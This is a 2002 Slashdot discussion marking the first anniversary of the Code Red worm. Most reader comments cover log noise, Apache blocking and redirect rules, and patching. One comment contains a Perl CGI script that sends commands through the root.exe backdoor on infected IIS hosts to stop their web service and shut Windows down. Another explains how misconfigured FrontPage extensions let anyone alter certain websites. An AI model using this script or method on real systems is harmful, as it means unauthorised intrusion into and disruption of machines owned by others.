Happy Birthday Code Red

← Back to Stories (view on slashdot.org)

Posted by ryuzaki0 on Thursday July 18, 2002 @04:01PM from the bring-back-public-spanking dept.

totallygeek writes: "One year ago today (July 19, 2001), more than 359,000 computers were infected with the Code Red worm in less than 14 hours. At the peak of infection, more than 2,000 new machines were infected each minute. Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since. For the first time, systems running the Apache web server were getting requests for a document called "default.ida". Here we are a year later, and my web log shows an average of forty-two requests per day for default.ida over the last five days. To really appreciate the spread of this program, look at this animated image."

20 of 364 comments (clear)

Min score:

Reason:

Sort:

Re:Logs Clogged by odaiwai · 2002-07-18 16:16 · Score: 5, Informative

That's the nimda worm. Running apache, you're immune to it, but it makes a mess in your logs.

One thing to do is have a cron job to scan your logs and if it sees any of the above, add the ip to an iptables blocklist. At least that way, you only get hit once by it from each infected host.

Or you could use apache's rewrite rules to forward all attacks to www.micrsoft.com, but I wouldn't recommend that.

dave
Animation Mirror Sites by morcheeba · 2002-07-18 16:17 · Score: 5, Informative

from the original analysis by David Moore:

UK Mirror
UK FTP
AU Mirror
Flipbook animation (207k .FLI)
Quicktime animation of growth by geographic breakdown (200K .mov {requires QuickTime v3 or newer} )
original www.caida.org gif animation

--
HIV Crosses Species Barrier... into Muppets
The image is... by timecop · 2002-07-18 16:36 · Score: 0, Informative

4,375,130 bytes long.
It's either really detailed or someone wanted to play a dirty trick on the admin.
I'm still downloading it, at about 1.5k/second. :)
Alternate URL for animated image by totallygeek · 2002-07-18 16:37 · Score: 3, Informative

Here

--
Click here or here.
1. Re:Alternate URL for animated image by millette · 2002-07-19 00:08 · Score: 2, Informative
  
  not sure which image you got. I was able to download the 4.2 GiB file and converted that to a mpeg4 (overkill, but I don't have anything to mess with gifs, I just recorded a "playback"). I've put the 400 KiB result here, if anyone is interested: http://tools.waglo.com:8888/codered.wmv if anyone is interested. Oh, you're gonna have to right-click, shift-click, whatever you have to do to download it. Like I said, it's just a quick and dirty job, and I'm not gonna leave it up longer then I have too.
Re:Logs Clogged by timecop · 2002-07-18 16:39 · Score: 5, Informative

many months ago when default.ida was the rage around the www, I added these couple lines to my httpd.conf:

SetEnvIf Request_URI "^/default.ida" dontlog
ErrorLog logs/254-error_log
CustomLog logs/254-access_log combined env=!dontlog

check out SetEnvIf in apache docs, you can do even better than this.
My school district's by DMDx86 · 2002-07-18 16:50 · Score: 5, Informative

Server is still infected with a IIS virus (though not Code Red). Here it is

I sent them an email - almost a year ago in fact. They just brushed me off and gave a rather pathetic excuse ("the box is too slow to run Norton").
You can read the e-mail here.

Of course, these are the same people who run a trouble ticket server on the district wide WAN that any old joe at school can access and see where the security issues are.
1. Re:My school district's by Qnal · 2002-07-18 17:17 · Score: 3, Informative
  
  Weird, I found a sadmind/IIS worm infection on Texas Community college website, I sent an email to the administrator but never got a reply back. I checked and its fixed now though.
  
  Another rampant problem with IIS that is still VERY VERY widespread is older Servers IIS 4.0 mainly, and some 5.0, that have FrontPage extensions installed, have botched NTFS permissions on the "Front Page Web".
  
  I don't know if anyone has noticed this, but if you have Microsoft Front Page installed on your browser, a little button shows up on your Internet Explorer toolbar, the default is usually the Word Icon, as in edit this page with Microsoft Word, but if you have Front Page installed on your computer, you can select Edit with FrontPage, and FrontPage will attempt to communicate with the Web Server for remote authoring, now if this web server is an IIS server, and has Front Page Extensions installed for remote authoring, and the NTFS permissions have not been set correctly, it will give you, the IUSR_ (Internet User) account FULL Priveleges to change the "Front Page web".
  
  As of now, I know 3 high profile companies who have this issue with their sites WIDE OPEN. Anyone can waltz in and alter their website, using the IUSR_ account. I would like to let them but how do I know they are not going to accuse me of something I didn't do, and just happened to stumble on.
  
  Oh well.
2. Re:My school district's by DMDx86 · 2002-07-18 17:48 · Score: 2, Informative
  
  There is an Apache fix that will patch the older versions of Apache. That is what I did on my webserver.
What pisses me off by Com2Kid · 2002-07-18 17:37 · Score: 4, Informative

What pisses me off is that when an early exploit was detected awhile back (err, many years), somebody released worm to go around and fix it but THEY where the ones who got in trouble with the FBI, thus setting a precident in the future saying that the computer community was not allowed to take all neccisary steps to fix problems that may pop up.

Kind of killed off community effort right there. >;(

--
Need help treating your acne? Come here!
Re:Looking at my records by spongman · 2002-07-18 18:14 · Score: 5, Informative

no, he's right:
6/18: MS sends MS01-33: Unchecked Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise - Run code of attacker's choice.
7/18: CodeRed hits, those of us who installed the MS01-33 patch laugh.
7/30: MS et al send out another alert uring people to read MS01-33 and install the patch.
Re:Logs Clogged by rossz · 2002-07-18 19:08 · Score: 3, Informative

robots.txt has a legitimate use. Redirecting attempts to access it would be extremely stupid.

When a legitimate bot such as google scans your system, it looks in robots.txt for find out where NOT to scan in case you have web pages you do not wish to be searchable.

--
-- Will program for bandwidth
Re:I still have my fake default.ida by FueledByRamen · 2002-07-18 19:19 · Score: 2, Informative

I just knocked together this perl script to send those items out, run it as a CGI script. Any comments / suggestions? WARNING: I'm still learning perl... this could be (is?) ugly! #!/usr/bin/perl # This is a CGI script. Properly linked from your # web server, it turns around and issues commands # to a code red-infected server that is trying # to kill your server. Make $YOURSERVER/default.ida run # this CGI script, and watch the other server stop its # IIS service and shut down windows. use LWP::Simple; my $incoming; my $request; print "HTTP/1.0 200 OK\n\nBeginning rooting of your code-red-infested box...\n"; print "This could look weird on your logs if you're not infected and just poking around.\n\n"; $request = sprintf("http://%s/scripts/root.exe?/c+iisreset+/s top",$ENV{REMOTE_ADDR}); $incoming = get $request; print "\n", $request, "\n\n", $incoming, "\n\n"; $request = sprintf("http://%s/scripts/root.exe?/c+rundll32.ex e+shell32.dll,SHExitWindowsEX+5" ,$ENV{REMOTE_ADDR}); $incoming = get $request; print "\n", $request, "\n\n", $incoming, "\n\n"; #Obligatory /. reference print "YHBT. Have a nice day.\n\n";

--
Every cloud has a silver lining (except for the mushroom shaped ones, which have a lining of Iridium & Strontium 90)
Re:Logs Clogged by Marqis · 2002-07-18 19:40 · Score: 2, Informative

Create a .htaccess (in the root of your website)file containing:
redirect /scripts http://www.stoptheviruscold.invalid
redirect /c http://www.stoptheviruscold.invalid
redirect /d http://www.stoptheviruscold.invalid
redirect /_mem_bin http://stoptheviruscold.invalid
redirect /_vti_bin http://stoptheviruscold.invalid
redirect /msadc http://stoptheviruscold.invalid
redirect /MSADC http://www.stoptheviruscold.invalid
RedirectMatch (.*)\cmd.exe$ http://stoptheviruscold.invalid$1
Re:Logs Clogged by onki · 2002-07-18 20:15 · Score: 2, Informative

Use mod_rewrite to direct those scans to a cgi/web script. I'm storing them in a database which is being read as soon as my firewall starts (laptop). Completely automated.
Re:Interesting... by Zocalo · 2002-07-18 21:34 · Score: 4, Informative
In this case I tend to partly side with Microsoft. OK, they put the bug there in the first place, but when you consider that:
- Every coder makes programming errors (some more than others, true).
- Microsoft released a *working* patch a few months before the exploits started.
- A work around was also available.
- A properly installed & configured server was *not* vulnerable.
- A web server does not need to *establish* outbound HTTP connections through the firewall, only to accept and reply to them.
You kind of get an idea where they are coming from.
PS. That last point is the crux, and denying webservers the ability to establish outbound HTTP connections would have stopped Code Red type exploits dead. If your network is properly configured, even if you are exploited, then the exploit should have a much harder time propagating and thus making you look like a complete incompetent. The *real* problem is that a *huge* proportion of sysadmins don't seem to understand the most basic of security principles, and that's not Microsoft's problem at all.
--
UNIX? They're not even circumcised! Savages!
Mirror by Kjellander · 2002-07-18 23:36 · Score: 2, Informative

Here's a mirror of the image.

http://razor.hemmet.chalmers.se/CodeRedSpreading.g if
Re:How did the Cherry Mountain Dew get its name? by Alex_Ionescu · 2002-07-18 23:53 · Score: 2, Informative

Actually, the worm got its virus from the drink.
Late at night, the programmers were drinking away their cans, when they identified the virus. They called it Code Red.
The 1% Patch Statistic by Proudrooster · 2002-07-19 02:07 · Score: 4, Informative

Believe it or not, out of all the people in in the world running MS Outlook, fewer than 1% have ever pulled down security patches, see The Great MS Patch Nobody Uses.

Additionally, the Win2K/NT server guys are afraid to install security patches since they never are really how much of their server is going to break. Often times, Admins will patch the servers which touch the Internet but not the Internal servers for fear of breaking them. With Code Red, this was quite humorous because the outer servers were patched as soon as the Code Red patch was available, thinking this action would defend the realm against Code Red, but they forgot about the laptop users which brought Code Red in the back door via the local LAN.

But not to worry folks, once we get Palladium hardware in all our servers, this will not happen again right? In fact we won't even have to patch anymore, since everything will be secure and, only secure applications will be allowed to run.

Oh, wait, wouldn't IIS pass the palladium trusted application test?

Why yes it would...... and Code Red would join the list of "Trusted Secure Applications".!
Sorry, I have to smack Palladium everytime I get a chance.
Re:Ya think? by ninjaz · 2002-07-19 05:14 · Score: 3, Informative

I just looked into the 22 code red hits one of my hosts has gotten from midnight to 9am today.

The results are:

5 down
14 reported as a Windows variant by nmap
2 unknown
1 Linux

I looked into the 2 unknown results a bit more. Both respond on port 80 with an IIS banner and ASPSESSIONID cookies. One of them has a Serv-U banner for ftp as well.

Interestingly, one of them (the one w/o Serv-U) is a .gov.cn site.

The Linux result answers on port 443 as a vulnerable version of Apache on someone's firewall in Italy. This is likely being used as a launchpad for attacks.

So, from what I gather, the bulk of the ongoing Code Red attacks are from Windows machines with extremely negligent administrators.